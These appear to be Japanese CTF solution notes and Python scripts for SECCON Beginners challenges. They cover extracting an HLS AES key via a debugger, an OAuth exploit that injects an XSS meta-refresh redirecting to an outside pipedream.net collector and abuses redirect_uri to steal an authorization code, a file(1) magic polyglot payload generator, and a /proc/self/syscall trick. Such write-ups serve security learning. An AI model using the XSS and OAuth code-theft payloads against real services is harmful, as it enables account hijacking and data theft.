bundleされたhls.jsを見てgetDecryptDataにbreakpointを張る
一回目はパスして、二回目のthis.keyを見るとAESのkeyがわかる
あとはffmpegでmp4を復元する
bundleされたhls.jsを見てgetDecryptDataにbreakpointを張る
一回目はパスして、二回目のthis.keyを見るとAESのkeyがわかる
あとはffmpegでmp4を復元する
import requests | |
# url = "http://localhost:3001/" | |
# client_url = "http://localhost:3000/" | |
url = "https://oooauth.beginners.seccon.games:3001/" | |
client_url = "https://oooauth.beginners.seccon.games:3000/" | |
ses = requests.Session() | |
data = { | |
"username": "guest", | |
"password": "guest", | |
"approved": "Approve", | |
} | |
# get valid codevalue | |
xss = '<meta/http-equiv="refresh"/content="0;https://eo89rba2rkj9j6f.m.pipedream.net">' | |
res = ses.get(f"{url}auth?response_type=code&client_id=oauth-client&redirect_uri={client_url}callback&scopes={xss}") | |
res = ses.post(f"{url}approve", data = data, allow_redirects=False) | |
code = res.headers["Location"].split("?code=")[1] | |
print(code) | |
url = f"{url}auth" | |
url += "?response_type=code&client_id=oauth-client" | |
url += '&scopes=hoge' | |
url += f"&redirect_uri={client_url}callback" | |
url += "?" + "grant_type%26" + "redirect_uri%26" + "a%26" * 997 + f"code={code}" | |
print(url) |
""" | |
5種類の開始位置が異なる%sを持つマッチパターンをfile -dの出力から頑張って見つけて、polyglotする | |
""" | |
""" | |
0 string PMEM | |
>4 string OBJ | |
>>4096 string >0 \b, obj.layout: '%s' | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/pmem#L44 | |
20 string GPAT GIMP pattern data, | |
>24 string x %s | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/gimp#L47 | |
44 string PTMF Poly Tracker PTM Module | |
>0 string >\32 Title: "%s" | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/audio#L470 | |
60 string RINEX | |
>80 search/256 XXRINEXB RINEX Data, GEO SBAS Broadcast | |
>>&32 string x \b, date %15.15s | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/meteorological#L8 | |
1080 string OKTA 8-channel Octalyzer module sound data | |
!:mime audio/x-mod | |
#audio/x-octalysertracker-module | |
>0 string >\0 Title: "%s" | |
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/audio#L232 | |
""" | |
payload = "PMEMOBJPDF" | |
payload += "K" * (20 - len(payload)) + "GPAT" + "PNG" | |
payload += "K" * (44 - len(payload)) + "PTMF" + "GIF"+"ELF" | |
payload += "K" * (60 - len(payload)) + "RINEX" + "K" * 20 + "XXRINEXB" + "K" * 32 + "JPEG" | |
# payload += "K" * (0x100 - len(payload)) + "IMA" + "ELF"*10 | |
payload += "K" * (1080 - len(payload)) + "OKTA" | |
payload += "K" * (4096 - len(payload)) + "PNG" | |
payload += "K" * (4990 - len(payload)) | |
payload += "\nQUIT\n" | |
# print(payload) | |
open("exp","w").write(payload) | |
""" | |
$ file -bkr exp | |
RINEX Data, GEO SBAS Broadcast, date JPEGKKKKKKKKKKK, version BJPDFK | |
- Persistent Memory Pool file, type: OBJ, version: 0x4b4b4644, compat: 0x4b4b4b4b, incompat: 0x4b4b4b4b, ro_compat: 0x54415047, crtime: *Invalid time*, alignment_desc: 0x4b4b4b4b4b4b4b47, machine_class: unknown (0x75), data: unknown (0x75), reserved[0]: 75, reserved[1]: 75, reserved[2]: 75, reserved[3]: 75, machine: unknown (0x19275), obj.layout: 'PNGKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK' | |
- 8-channel Octalyzer module sound data Title: "PMEMOBJPDFKKKKKKKKKKGPATPNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKK" | |
- Poly Tracker PTM Module Title: "PMEMOBJPDFKKKKKKKKKKGPATPNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKK" | |
- GIMP pattern data, PNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKKKKKKKKKKKKKKKKKKKKKKKKKK | |
- , ASCII text, with very long lines | |
""" |
https://linuxjm.osdn.jp/html/LDP_man-pages/man5/proc.5.html を見る
/proc/self/syscall
を見るとread syscallをしている様子を確認できて、引数を読むとfdがわかる